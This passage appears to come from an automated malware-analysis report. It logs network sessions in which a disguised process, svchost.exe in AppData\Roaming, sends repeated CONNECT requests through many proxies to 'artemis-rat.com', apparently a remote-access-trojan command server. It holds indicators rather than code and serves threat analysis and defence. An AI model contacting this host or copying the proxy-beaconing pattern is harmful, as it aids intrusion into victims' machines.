                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3072192.168.2.559961184.72.36.898043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.452927113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.627206087 CET344INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 199
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3073192.168.2.559167192.111.137.35414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.477308989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3074192.168.2.559935107.180.89.1854906243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.477308989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.145767927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.834100008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.146444082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849435091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3075192.168.2.55990545.43.81.44569143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.477473021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.764940977 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3076192.168.2.5598908.210.80.1911567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.477780104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3077192.168.2.559894218.252.244.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.479187012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3078192.168.2.55769370.166.167.385772843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.479304075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3079192.168.2.557933206.81.14.1683196643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.480122089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.639980078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3080192.168.2.559944162.120.71.118043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.491148949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3081192.168.2.55989194.30.152.1728043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.502331018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.840651035 CET310INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 150
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3082192.168.2.559889216.9.224.1138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.506408930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3083192.168.2.55991823.137.248.197888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.531410933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3084192.168.2.558057198.44.255.38043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.543842077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.854285002 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.24.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3085192.168.2.55993423.137.248.1978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.545306921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3086192.168.2.559916103.166.141.742007443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.572995901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3087192.168.2.55991527.65.240.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.589202881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3088192.168.2.559917202.150.1.878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.589340925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3089192.168.2.559962122.51.123.2198043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.624243975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3090192.168.2.559936185.191.236.162312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.638638020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.100712061 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3091192.168.2.559940103.231.78.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.638674021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3092192.168.2.5599648.219.179.2371567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.643064022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3093192.168.2.559795185.158.114.142569743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.649811029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3094192.168.2.55988543.155.130.1821567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.649947882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3095192.168.2.559474198.12.253.1173113143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.681487083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3096192.168.2.55995343.231.22.2288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.685242891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3097192.168.2.559971192.154.246.96900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.694844007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3098192.168.2.559456161.97.170.2096229143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.695127964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.442656040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3099192.168.2.55824851.89.173.401105843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.695208073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.442682981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3100192.168.2.55823837.187.77.581893643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.719923973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3101192.168.2.559975199.188.93.214900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.723162889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3102192.168.2.559504138.36.150.16108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.723181009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3103192.168.2.559965123.241.210.1238043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.738966942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.165153027 CET326INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3104192.168.2.558083196.2.13.12415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.744282007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3105192.168.2.55996814.103.24.20800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.744389057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
